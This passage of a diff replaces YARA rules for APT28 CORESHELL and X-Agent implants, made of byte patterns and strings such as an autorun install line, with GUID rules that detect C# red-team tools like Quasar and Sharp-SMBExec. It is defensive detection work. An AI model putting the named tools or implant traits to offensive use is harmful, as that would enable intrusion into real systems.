+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3649-L3665"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "72b9e4de0389df3a14f92660e91749dea4d31905eb7391163c3503bc953d661f"
-		score = 85
+		logic_hash = "b6cabc8a50db469162024b13df8d69f57ca5ec008bddc647aee2a73dff9942c8"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$STR1 = {55 8b ec 6a fe 68 [4] 68 [4] 64 A1 00 00 00 00 50 83 EC 0C 53
-         56 57 A1 [4] 31 45 F8 33 C5 50 8D 45 F0 64 A3 00 00 00 00 [8-14] 68
-         [4] 6a 01 [1-2] FF 15 [4] FF 15 [4] 3D B7 00 00 00 75 27}
+		$typelibguid0lo = "85773eb7-b159-45fe-96cd-11bad51da6de" ascii wide
+		$typelibguid0up = "85773EB7-B159-45FE-96CD-11BAD51DA6DE" ascii wide
+		$typelibguid1lo = "9d32ad59-4093-420d-b45c-5fff391e990d" ascii wide
+		$typelibguid1up = "9D32AD59-4093-420D-B45C-5FFF391E990D" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_IMPLANT_2_V14 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpire : FILE
 {
 	meta:
-		description = "CORESHELL/SOURFACE Implant by APT28"
-		author = "US CERT"
-		id = "1e4958e7-e136-5600-bc16-36cdeeb3ea18"
-		date = "2017-02-10"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L269-L293"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "32bdaa0f-3afc-5e0e-a20f-e21f33909af7"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/0xbadjuju/Sharpire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3667-L3681"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4abb1e1c68ced667f04a69c58c89187f9ccc0633c5dc5f396ba8d210bf405f93"
-		score = 85
+		logic_hash = "f8ddf85c279c6ea4a2db679a0d5c816837e8bd91f1f6e15787dd34463483fc85"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$STR1 = {8B ?? 44 89 44 24 60 41 F7 E0 8B F2 B8 AB AA AA AA C1 EE 02 89
-         74 24 58 44 8B ?? 41 F7 ?? 8B CA BA 03 00 00 00 C1 E9 02 89 0C 24 8D
-         04 49 03 C0 44 2B ?? 44 89 ?? 24 04 3B F1 0F 83 ?? 01 00 00 8D 1C 76
-         4C 89 6C 24  }
-		$STR2 = {C5 41 F7 E0 ?? ?? ?? ?? ?? ?? 8D 0C 52 03 C9 2B C1 8B C8 ?? 8D
-         04 ?? 46 0F B6 0C ?? 40 02 C7 41 8D 48 FF 44 32 C8 B8 AB AA AA AA F7
-         E1 C1 EA 02 8D 04 52 03 C0 2B C8 B8 AB AA AA AA 46 22 0C ?? 41 8D 48
-         FE F7 E1 C1 EA 02 8D 04 52 03 C0 2B C8 8B C1 }
-		$STR3 = {41 F7 E0 C1 EA 02 41 8B C0 8D 0C 52 03 C9 2B C1 8B C8 42 8D 04
-         1B 46 0F B6 0C ?? 40 02 C6 41 8D 48 FF 44 32 C8 B8 AB AA AA AA F7 E1
-         C1 EA 02 8D 04 52 03 C0 2B C8 B8 AB AA AA AA }
-		$STR4 = {46 22 0C ?? 41 8D 48 FE F7 E1 C1 EA 02 8D 04 52 8B 54 24 58 03
-         C0 2B C8 8B C1 0F B6 4F FF 42 0F B6 04 ?? 41 0F AF CB C1 }
+		$typelibguid0lo = "39b75120-07fe-4833-a02e-579ff8b68331" ascii wide
+		$typelibguid0up = "39B75120-07FE-4833-A02E-579FF8B68331" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and any of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_IMPLANT_2_V15 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharp_Smbexec : FILE
 {
 	meta:
-		description = "CORESHELL/SOURFACE Implant by APT28"
-		author = "US CERT"
-		id = "9bdaebc1-86a0-5c21-b752-d69cdb70f082"
-		date = "2017-02-10"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L295-L310"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "6a1024af-734c-5974-af50-db51dbd694ff"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/checkymander/Sharp-SMBExec"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3683-L3697"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "fac61e80803941193c41ecf8b3fcbee21b5cc41542989ecd93542c32e87da983"
-		score = 85
+		logic_hash = "e9e248c4ac359a098f1ef26dc300e38836f070545db182a0b72a6eaf9bf003da"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$XOR_LOOP1 = { 32 1C 02 33 D2 8B C7 89 5D E4 BB 06 00 00 00 F7 F3 }
-		$XOR_LOOP2 = { 32 1C 02 8B C1 33 D2 B9 06 00 00 00 F7 F1 }
-		$XOR_LOOP3 = { 02 C3 30 06 8B 5D F0 8D 41 FE 83 F8 06 }
+		$typelibguid0lo = "344ee55a-4e32-46f2-a003-69ad52b55945" ascii wide
+		$typelibguid0up = "344EE55A-4E32-46F2-A003-69AD52B55945" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_IMPLANT_2_V16 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Misctools : FILE
 {
 	meta:
-		description = "CORESHELL/SOURFACE Implant by APT28"
-		author = "US CERT"
-		id = "2c54a749-c80b-5010-97b6-b74c54fd3d07"
-		date = "2017-02-10"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L312-L329"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "ce49cc7b-a5a5-52b7-a7bf-bbb0c5b29b8a"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/rasta-mouse/MiscTools"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3699-L3721"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "638cb66e5ff52ac5a1df0954969e7c54a3b25518228e4f8f344aafe6760985d2"
-		score = 85
+		logic_hash = "551c11eb44007cefd7e588fa97659cea44cf64b32a2e061aab425aa4a67583ef"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$OBF_FUNCT = { 0F B6 1C 0B 8D 34 08 8D 04 0A 0F AF D8 33 D2 8D 41 FF F7
-         75 F8 8B 45 0C C1 EB 07 8D 79 01 32 1C 02 33 D2 8B C7 89 5D E4 BB 06
-         00 00 00 F7 F3 8B 45 0C 8D 59 FE 02 5D FF 32 1C 02 8B C1 33 D2 B9 06
-         00 00 00 F7 F1 8B 45 0C 8B CF 22 1C 02 8B 45 E4 8B 55 E0 02 C3 30 06
-         8B 5D F0 8D 41 FE 83 F8 06 8B 45 DC 72 9A }
+		$typelibguid0lo = "384e9647-28a9-4835-8fa7-2472b1acedc0" ascii wide
+		$typelibguid0up = "384E9647-28A9-4835-8FA7-2472B1ACEDC0" ascii wide
+		$typelibguid1lo = "d7ec0ef5-157c-4533-bbcd-0fe070fbf8d9" ascii wide
+		$typelibguid1up = "D7EC0EF5-157C-4533-BBCD-0FE070FBF8D9" ascii wide
+		$typelibguid2lo = "10085d98-48b9-42a8-b15b-cb27a243761b" ascii wide
+		$typelibguid2up = "10085D98-48B9-42A8-B15B-CB27A243761B" ascii wide
+		$typelibguid3lo = "6aacd159-f4e7-4632-bad1-2ae8526a9633" ascii wide
+		$typelibguid3up = "6AACD159-F4E7-4632-BAD1-2AE8526A9633" ascii wide
+		$typelibguid4lo = "49a6719e-11a8-46e6-ad7a-1db1be9fea37" ascii wide
+		$typelibguid4up = "49A6719E-11A8-46E6-AD7A-1DB1BE9FEA37" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and $OBF_FUNCT
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_IMPLANT_2_V17 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Memorymapper : FILE
 {
 	meta:
-		description = "CORESHELL/SOURFACE Implant by APT28"
-		author = "US CERT"
-		id = "dc3a6b08-1ac4-5fa2-a710-657514d45606"
-		date = "2017-02-10"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L331-L347"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "c978be10-315c-54e7-afea-f97e9a5f2d18"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/jasondrawdy/MemoryMapper"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3723-L3737"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ea2793e6ce9e9d97e70a9452a38eb4d5ddbcc275af6ae7f5d094dc77e112d278"
-		score = 85
+		logic_hash = "ccdb8501b0f26aca352a13d5337d64c2eccff695bd052bd10bcd324c62c931e5"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$STR1 = { 24108b44241c894424148b4424246836 }
-		$STR2 = { 518d4ddc516a018bd08b4de4e8360400 }
-		$STR3 = { e48178061591df75740433f6eb1a8b48 }
-		$STR4 = { 33d2f775f88b45d402d903c641321c3a }
-		$STR5 = { 006a0056ffd083f8ff74646a008d45f8 }
+		$typelibguid0lo = "b9fbf3ac-05d8-4cd5-9694-b224d4e6c0ea" ascii wide
+		$typelibguid0up = "B9FBF3AC-05D8-4CD5-9694-B224D4E6C0EA" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and 2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_IMPLANT_2_V18 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Vanillarat : FILE
 {
 	meta:
-		description = "CORESHELL/SOURFACE Implant by APT28"
-		author = "US CERT"
-		id = "5376ec57-f405-55cf-a23b-aafb1cb800e5"
-		date = "2017-02-10"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L349-L376"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "9448e8d0-5bfc-5683-b633-284e43d24642"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/DannyTheSloth/VanillaRAT"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3739-L3755"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d982b3b1407e140f586772ce409e47bd29e567af41e466cd94d0983c93aab917"
-		score = 85
+		logic_hash = "4241cbbf7cde175b6dfd27b59123e5e324f4356184dae07529dd021c0f3dbea9"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$STR1 = { 8A C1 02 C0 8D 1C 08 8B 45 F8 02 DB 8D 4A 02 8B 55 0C 88 5D FF
-         8B 5D EC 83 C2 FE 03 D8 89 55 E0 89 5D DC 8D 49 00 03 C1 8D 34 0B 0F
-         B6 1C 0A 0F AF D8 33 D2 8D 41 FF F7 75 F4 8B 45 0C C1 EB 07 8D 79 01
-         32 1C 02 33 D2 8B C7 89 5D E4 BB 06 00 00 00 F7 F3 8B 45 0C 8D 59 FE
-         02 5D FF 32 1C 02 8B C1 33 D2 B9 06 00 00 00 F7 F1 8B 45 0C 8B CF 22
-         1C 02 8B 45 E4 8B 55 E0 02 C3 30 06 8B 5D DC 8D 41 FE 83 F8 06 8B 45
-         F8 72 9B 8B 4D F0 8B 5D D8 8B 7D 08 8B F0 41 83 C6 06 89 4D F0 89 75
-         F8 3B 4D D4 0F 82 ?? ?? ?? ?? 8B 55 E8 3B CB 75 09 8D 04 5B 03 C0 2B
-         F8 EB 02 33 FF 3B FA 0F 83 ?? ?? ?? ?? 8B 5D EC 8A C1 02 C0 83 C3 FE
-         8D 14 08 8D 04 49 02 D2 03 C0 88 55 0B 8D 48 FE 8D 57 02 03 C3 89 4D
-         D4 8B 4D 0C 89 55 F8 89 45 D8 EB 06 8D 9B 00 00 00 00 0F B6 5C 0A FE
-         8D 34 02 8B 45 D4 03 C2 0F AF D8 8D 7A 01 8D 42 FF 33 D2 F7 75 F4 C1
-         EB 07 8B C7 32 1C 0A 33 D2 B9 06 00 00 00 F7 F1 8A 4D F8 8B 45 0C 80
-         E9 02 02 4D 0B 32 0C 02 8B 45 F8 33 D2 F7 75 F4 8B 45 0C 22 0C 02 8B
-         D7 02 D9 30 1E 8B 4D 0C 8D 42 FE 3B 45 E8 }
+		$typelibguid0lo = "d0f2ee67-0a50-423d-bfe6-845da892a2db" ascii wide
+		$typelibguid0up = "D0F2EE67-0A50-423D-BFE6-845DA892A2DB" ascii wide
+		$typelibguid1lo = "a593fcd2-c8ab-45f6-9aeb-8ab5e20ab402" ascii wide
+		$typelibguid1up = "A593FCD2-C8AB-45F6-9AEB-8AB5E20AB402" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_IMPLANT_2_V19 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Unmanagedpowershell : FILE
 {
 	meta:
-		description = "CORESHELL/SOURFACE Implant by APT28"
-		author = "US CERT"
-		id = "b4efdb3c-d7d6-5141-ad73-90d70582f8bd"
-		date = "2017-02-10"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L378-L404"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "49ff1362-0ac5-580d-97f3-516f2a10072b"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/leechristensen/UnmanagedPowerShell"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3757-L3771"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "42bee6ddf0b13774efb6712135c3e0b4eae6364120f8973272820f5f669671d1"
-		score = 85
+		logic_hash = "26e59a31b1021c6e65711ee8d58cfdf3e1a8563b91f0f55722e1306854103ac6"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$obfuscated_RSA1 = { 7C 41 B4 DB ED B0 B8 47 F1 9C A1 49 B6 57 A6 CC D6
-         74 B5 52 12 4D FC B1 B6 3B 85 73 DF AB 74 C9 25 D8 3C EA AE 8F 5E D2
-         E3 7B 1E B8 09 3C AF 76 A1 38 56 76 BB A0 63 B6 9E 5D 86 E4 EC B0 DC
-         89 1E FA 4A E5 79 81 3F DB 56 63 1B 08 0C BF DC FC 75 19 3E 1F B3 EE
-         9D 4C 17 8B 16 9D 99 C3 0C 89 06 BB F1 72 46 7E F4 0B F6 CB B9 C2 11
-         BE 5E 27 94 5D 6D C0 9A 28 F2 2F FB EE 8D 82 C7 0F 58 51 03 BF 6A 8D
-         CD 99 F8 04 D6 F7 F7 88 0E 51 88 B4 E1 A9 A4 3B }
-		$cleartext_RSA1 = { 06 02 00 00 00 A4 00 00 52 53 41 31 00 04 00 00 01
-         00 01 00 AF BD 26 C9 04 65 45 9F 0E 3F C4 A8 9A 18 C8 92 00 B2 CC 6E
-         0F 2F B2 71 90 FC 70 2E 0A F0 CA AA 5D F4 CA 7A 75 8D 5F 9C 4B 67 32
-         45 CE 6E 2F 16 3C F1 8C 42 35 9C 53 64 A7 4A BD FA 32 99 90 E6 AC EC
-         C7 30 B2 9E 0B 90 F8 B2 94 90 1D 52 B5 2F F9 8B E2 E6 C5 9A 0A 1B 05
-         42 68 6A 3E 88 7F 38 97 49 5F F6 EB ED 9D EF 63 FA 56 56 0C 7E ED 14
-         81 3A 1D B9 A8 02 BD 3A E6 E0 FA 4D A9 07 5B E6 }
+		$typelibguid0lo = "dfc4eebb-7384-4db5-9bad-257203029bd9" ascii wide
+		$typelibguid0up = "DFC4EEBB-7384-4DB5-9BAD-257203029BD9" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and any of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_IMPLANT_2_V20 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Quasar : FILE
 {
 	meta:
-		description = "CORESHELL/SOURFACE Implant by APT28"
-		author = "US CERT"
-		id = "323ee676-802d-55e6-a97a-48eb3a4e4a5f"
-		date = "2017-02-10"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L406-L423"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "b938cf7d-27fd-5fa2-b0e5-d4da5670f3ef"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/quasar/Quasar"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3773-L3789"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "72c62a764c5c7c19a07957fd6fbfcffd689900cc2759d408d239fe08a3b76b9c"
-		score = 85
+		logic_hash = "752602eecc404757f029aea481a58dc5b3d4c80f53fea1281e1ab8a78476d416"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$func = { 0F B6 5C 0A FE 8D 34 02 8B 45 D4 03 C2 0F AF D8 8D 7A 01 8D 42
-         FF 33 D2 F7 75 F4 C1 EB 07 8B C7 32 1C 0A 33 D2 B9 06 00 00 00 F7 F1
-         8A 4D F8 8B 45 0C 80 E9 02 02 4D 0B 32 0C 02 8B 45 F8 33 D2 F7 75 F4
-         8B 45 0C 22 0C 02 8B D7 02 D9 30 1E 8B 4D 0C 8D 42 FE 3B 45 E8 8B 45
-         D8 89 55 F8 72 A0 }
+		$typelibguid0lo = "cfda6d2e-8ab3-4349-b89a-33e1f0dab32b" ascii wide
+		$typelibguid0up = "CFDA6D2E-8AB3-4349-B89A-33E1F0DAB32B" ascii wide
+		$typelibguid1lo = "c7c363ba-e5b6-4e18-9224-39bc8da73172" ascii wide
+		$typelibguid1up = "C7C363BA-E5B6-4E18-9224-39BC8DA73172" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_IMPLANT_3_V1
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpadidnsdump : FILE
 {
 	meta:
-		description = "X-Agent/CHOPSTICK Implant by APT28"
-		author = "US CERT"
-		id = "d539bb31-18b2-5cf5-b994-daecd5f8c771"
-		date = "2017-02-10"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L425-L442"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "51d50b22-4e73-5378-9e0d-ad7730987293"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/b4rtik/SharpAdidnsdump"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3791-L3805"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4c7b6c76bc10784abf96cc71b34ffc9a9de569fd536505528752221d22b26629"
-		score = 85
+		logic_hash = "fe1bfdd03fabe40c2b885121de343890dd7eea22b51e9a1133d0842ba1080c78"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$STR1 = ">process isn't exist<" ascii wide
-		$STR2 = "shell\\open\\command=\"System Volume Information\\USBGuard.exe\" install" ascii wide
-		$STR3 = "User-Agent: Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0" ascii wide
-		$STR4 = "webhp?rel=psy&hl=7&ai=" ascii wide
-		$STR5 = {0f b6 14 31 88 55 ?? 33 d2 8b c1 f7 75 ?? 8b 45 ?? 41 0f b6 14
-         02 8a 45 ?? 03 fa}
+		$typelibguid0lo = "cdb02bc2-5f62-4c8a-af69-acc3ab82e741" ascii wide
+		$typelibguid0up = "CDB02BC2-5F62-4C8A-AF69-ACC3AB82E741" ascii wide
 
 	condition:
-		any of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_IMPLANT_3_V2 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Dotnettojscript : FILE
 {
 	meta:
-		description = "X-Agent/CHOPSTICK Implant by APT28"
-		author = "US CERT"
-		id = "349c65cf-547f-5837-af71-f9721e029b74"
-		date = "2017-02-10"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L444-L464"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "31827074-fc63-5690-b6c7-8e89daacc07f"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/tyranid/DotNetToJScript"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3807-L3821"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0a658888dcc7b7f4620f08449c6ec492756750e64f15b048f7cdee7de4fc0479"
-		score = 85
+		logic_hash = "ddaa4e3dac9d98f3aba0eff7a968a7599c2901ec8b668c5e1115ac67a0a77f30"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$base_key_moved = {C7 45 ?? 3B C6 73 0F C7 45 ?? 8B 07 85 C0 C7 45 ?? 74
-         02 FF D0 C7 45 ?? 83 C7 04 3B C7 45 ?? FE 72 F1 5F C7 45 ?? 5E C3 8B
-         FF C7 45 ?? 56 B8 D8 78 C7 45 ?? 75 07 50 E8 C7 45 ?? B1 D1 FF FF C7
-         45 ?? 59 5D C3 8B C7 45 ?? FF 55 8B EC C7 45 ?? 83 EC 10 A1 66 C7 45
-         ?? 33 35}
-		$base_key_b_array = {3B C6 73 0F 8B 07 85 C0 74 02 FF D0 83 C7 04 3B FE
-         72 F1 5F 5E C3 8B FF 56 B8 D8 78 75 07 50 E8 B1 D1 FF FF 59 5D C3 8B
-         FF 55 8B EC 83 EC 10 A1 33 35 }
+		$typelibguid0lo = "7e3f231c-0d0b-4025-812c-0ef099404861" ascii wide
+		$typelibguid0up = "7E3F231C-0D0B-4025-812C-0EF099404861" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and any of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_IMPLANT_3_V3 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Inferno : FILE
 {
 	meta:
-		description = "X-Agent/CHOPSTICK Implant by APT28"
-		author = "US CERT"
-		id = "ce82511e-715a-53cb-98e5-5d51b94726d5"
-		date = "2017-02-10"
-		modified = "2021-03-15"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L466-L485"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "af2d9832-c7f9-5879-a19b-a3c4d91b8b3f"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/LimerBoy/Inferno"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3823-L3837"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
